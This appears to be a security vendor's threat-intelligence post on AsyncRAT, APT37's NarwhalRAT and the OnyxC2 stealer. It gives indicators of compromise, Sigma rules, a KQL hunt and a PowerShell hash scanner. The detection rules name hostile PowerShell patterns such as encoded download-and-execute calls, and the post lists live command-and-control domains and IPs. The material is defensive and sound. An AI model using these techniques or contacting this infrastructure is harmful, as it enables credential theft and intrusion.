AsyncRAT, APT37 NarwhalRAT & OnyxC2: OTX Pulse Analysis of Active RAT & Stealer Campaigns

Excerpt

Active campaigns delivering AsyncRAT via AI lures, APT37's NarwhalRAT, and OnyxC2 MaaS. High urgency due to credential theft.

Threat Summary

Recent OTX pulses indicate a surge in sophisticated Remote Access Trojans (RATs) and stealers utilizing complex initial access vectors. Three distinct campaigns have been identified:

AsyncRAT (AI-Themed Lures): Threat actors are exploiting the AI hype cycle, distributing malicious files disguised as "technical guides" or learning resources. The campaign uses multi-stage infection chains involving compressed archives, LNK shortcuts, and heavy PowerShell obfuscation to deliver AsyncRAT via reflective injection and process hollowing.
APT37 (NarwhalRAT): A state-aligned threat actor is targeting Korean entities with spear-phishing emails masquerading as Microsoft security alerts. The payload, delivered via ZIP archives containing LNK files, leads to the deployment of a Python-based backdoor (NarwhalRAT/ROKRAT) capable of extensive surveillance (keylogging, microphone recording) and data exfiltration via dead-drop resolvers.
OnyxC2 (MaaS): A new Malware-as-a-Service (MaaS) platform, OnyxC2, has emerged on the dark web for $250/month. Written in C++ with direct syscall assembly to evade EDR, it targets over 210 applications, including password managers and 2FA extensions, signaling a commoditized threat to enterprise credentials.

Collective Objective: The primary objective across these campaigns is the theft of sensitive credentials, persistent remote access, and surveillance. The convergence of AI-themed social engineering and advanced MaaS platforms significantly lowers the barrier to entry for high-impact attacks.

Threat Actor / Malware Profile

AsyncRAT (Chinese Threat Actor)

Distribution: Malicious compressed archives (ZIP/RAR) containing LNK shortcuts and hidden decoy PDFs.
Payload Behavior: Utilizes PowerShell scripts for obfuscation. Employs reflective injection and process hollowing to evade memory scanning.
C2 Communication: Connects to C2 domains (e.g., shampobiskworld.nl).
Persistence: Uses scheduled tasks created via PowerShell.
Anti-Analysis: Multi-stage execution with heavy obfuscation layers.

APT37 (NarwhalRAT)

Distribution: Spear-phishing emails with Microsoft-themed lures, ZIP archives containing LNK files.
Payload Behavior: Python-based backdoor featuring keylogging, screen capture, microphone recording, and USB data collection. Uses BAT-based obfuscation.
C2 Communication: Leverages "dead-drop resolvers" (e.g., pcloud) to hide the actual C2 server IP.
Persistence: Established via registry modifications or scheduled tasks (standard for ROKRAT variants).
Anti-Analysis: Anti-VM techniques and LNK obfuscation.

OnyxC2 (Unknown / MaaS)

Distribution: Sold on cybercrime forums; payload builder generates DLLs or executables.
Payload Behavior: Written in C++ with Assembly for direct syscalls (bypassing user-mode API hooks). Targets 45 browsers, 109 extensions, and 5 password managers.
Persistence: Likely via Registry Run keys or DLL Sideloading.
C2 Communication: HTTP/HTTPS to custom domains.
Anti-Analysis: Direct syscalls to evade EDR hooks.

IOC Analysis

The provided IOCs include a mix of network and file-based indicators:

File Hashes (SHA256, MD5, SHA1): Critical for EDR correlation. The SHA256 hashes for AsyncRAT and OnyxC2 loaders should be blocklisted immediately. MD5 hashes are provided for the APT37 components.
Domains (C2/Dead-Drops): Includes shampobiskworld.nl (AsyncRAT), crwellfood.com (APT37), and akmuniverstall.top (OnyxC2). SOC teams should block these at the perimeter and DNS layer.
IPv4 Addresses: Specific IPs associated with APT37 infrastructure (211.239.157.126, 218.150.78.198) should be firewalled.

Operational Guidance:

Tooling: Use SIEM integrations to correlate the hashes against Sysmon Event ID 1 (Process Create) and EDR alerts. The domains should be fed into threat intelligence feeds (TI) for blocking.
Decoding: PowerShell scripts found in these campaigns often use Base64 or XOR encoding. Ensure your automated sandboxing (e.g., Cuckoo, Triage) is configured to capture command-line arguments for decoding.

Detection Engineering

Sigma Rules

YAML

---
title: Potential AsyncRAT AI-Themed LNK Execution
id: 8a3e2c1d-5f4a-4b2e-9c1d-8f7a6b5c4d3e
description: Detects execution of LNK files from compressed archives that launch PowerShell, a technique observed in AsyncRAT campaigns using AI-themed lures.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d795f0f9a43793a657d5
logsource:
    category: process_creation
    product: windows
detection:
    selection_lnk:
        ParentImage|endswith: \explorer.exe
        Image|endswith: \cmd.exe
        CommandLine|contains: '.lnk'
    selection_powershell:
        Image|endswith: \powershell.exe
        CommandLine|contains:
            - 'FromBase64String'
            - 'IEX'
            - 'DownloadString'
    selection_keywords:
        CommandLine|contains:
            - 'AI'
            - 'GPT'
            - 'Prompt'
            - 'Library'
    condition: all of selection_*
falsepositives:
    - Legitimate administrative scripts
level: high
---
title: APT37 NarwhalRAT Python Process Execution
id: 7b2f1e0a-4e3d-4c1b-8b2f-7e6c5d4b3a2e
description: Detects suspicious Python process execution spawning from a cmd or batch script, potentially indicating NarwhalRAT activity following LNK obfuscation.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d7f5f0f9a43793a657e6
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - \cmd.exe
            - \powershell.exe
    selection_python:
        Image|endswith: \python.exe
        CommandLine|contains: '.py'
    selection_suspicious_paths:
        CurrentDirectory|contains:
            - \AppData\Local\Temp
            - \AppData\Roaming
    condition: all of selection_*
falsepositives:
    - Legitimate Python development
level: medium
---
title: OnyxC2 Stealer Direct Syscalls and Assembly Pattern
id: 6c1e0d9c-3d2c-4b0a-7a1e-6d5c4b3a2e1f
description: Detects processes attempting to allocate memory with execute permissions indicative of reflective loading or direct syscalls used by OnyxC2 and similar stealers.
status: stable
author: Security Arsenal
date: 2026/06/16
references:
    - https://otx.alienvault.com/pulse/6677d835f0f9a43793a657f5
logsource:
    category: process_access
    product: windows
detection:
    selection:
        GrantedAccess: '0x143A' # PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
        CallTrace|contains:
            - 'ntdll.dll'
    filter_legit:
        SourceImage|endswith:
            - \sihost.exe
            - \svchost.exe
            - \explorer.exe
    condition: selection and not filter_legit
falsepositives:
    - Low
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for AsyncRAT, APT37, and OnyxC2 Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    "shampobiskworld.nl", 
    "shampoolagtto.com", 
    "shamppocosmaticso.com",
    "crwellfood.com",
    "fe01.co.kr",
    "akmuniverstall.top"
) 
or RemoteIP in ("211.239.157.126", "218.150.78.198")
| extend FullUrl = iff(RemoteUrl != "", RemoteUrl, RemoteIP)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort, FullUrl
| order by Timestamp desc

PowerShell Hunt Script

PowerShell

# IOC Hunter for AsyncRAT, NarwhalRAT, and OnyxC2
# Requires Admin privileges for full disk access

$MaliciousHashes = @(
    # AsyncRAT SHA256
    "61b7fa5a7186cbf73dbc1f03e6e6f6819f5eb1e630a001059d381114bda2f974",
    "7d6ee3c6ff8f70b1817aaec82aff1d2babe0b62cafef3975262644743afc0cb8",
    "96b486bd7308ef3d6771360800f4c9b48b10697bd4cb69a8589b97b039377ecb",
    # OnyxC2 SHA256
    "78945c844fc23dd3446cf17987edeeb6cc21986820c92df82a126af24a5a38d1",
    "d89bb4b23a67814ef511e4e9dda7ad36fa519a322fa7c25ea451c7dd7ef61e54",
    "41999a3d0da035ff8068905c90235ea50121329cb0661e38d745974ebf5e3ae2",
    # APT37 / NarwhalRAT MD5
    "3715092aa00f380cefe8b4d2eddb7d08",
    "7cef19f9c4480adac0cd4702ff98f46c",
    "7eb9cee1f696727752169f25cf79a338",
    "b6b0602310bb2d4360c52685119aac1b",
    # OnyxC2 MD5
    "b5b603ff57142a454c3b0fb12eb8a4eb",
    "cf64c7e2e3897ae5fce3d5414e3d1d27"
)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan

$DrivesToScan = @("C:") # Extend as needed

foreach ($Drive in $DrivesToScan) {
    Write-Host "Scanning $Drive..."
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $File = $_
        try {
            $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
            }
            # Check MD5 for APT37 indicators if not found via SHA256
            $HashMD5 = (Get-FileHash -Path $File.FullName -Algorithm MD5 -ErrorAction Stop).Hash
            if ($MaliciousHashes -contains $HashMD5) {
                Write-Host "[!] MALICIOUS FILE FOUND (MD5): $($File.FullName)" -ForegroundColor Red
            }
        } catch {
            # Ignore errors (e.g., locked files)
        }
    }
}

# Check for suspicious Scheduled Tasks (AsyncRAT persistence)
Write-Host "`n[+] Checking for suspicious Scheduled Tasks..." -ForegroundColor Cyan
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } | ForEach-Object {
    $Task = $_
    $Action = $Task.Actions.Execute
    $Arg = $Task.Actions.Arguments
    if ($Action -match "powershell" -and $Arg -match "-enc" -or $Arg -match "-w hidden") {
        Write-Host "[!] Suspicious Scheduled Task: $($Task.TaskName)" -ForegroundColor Yellow
        Write-Host "    Action: $Action $Arg"
    }
}

Response Priorities

Immediate (0-4 hours)

Block IOCs: Implement blocks on all listed domains and IP addresses at the firewall and proxy level.
Hunt for Execution Artifacts: Run the provided PowerShell script to scan endpoints for the specific file hashes associated with AsyncRAT, NarwhalRAT, and OnyxC2.
Isolate Infected Hosts: If any hashes or scheduled tasks are detected, isolate the host from the network immediately to prevent C2 communication and lateral movement.

24 Hours

Identity Verification: Given OnyxC2's focus on password managers and 2FA theft, force a password reset and MFA re-enrollment for accounts that may have been accessed from potentially compromised endpoints.
Log Analysis: Review SecurityEvent ID 4688 (Process Creation) and Sysmon ID 7 (Image Loaded) for signs of process hollowing or unusual Python executions in user directories.

1 Week

Architecture Hardening:
- Restrict the usage of PowerShell to constrained language mode where possible.
- Implement application whitelisting (e.g., AppLocker) to block unsigned executables and scripts originating from user directories (%AppData%, %Temp%).
- Disable LNK files from running from internet-downloaded archives (Mark of the Web enforcement).
User Awareness: Update security awareness training to specifically highlight the risks of "AI-themed" phishing lures and Microsoft-themed credential harvesting.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub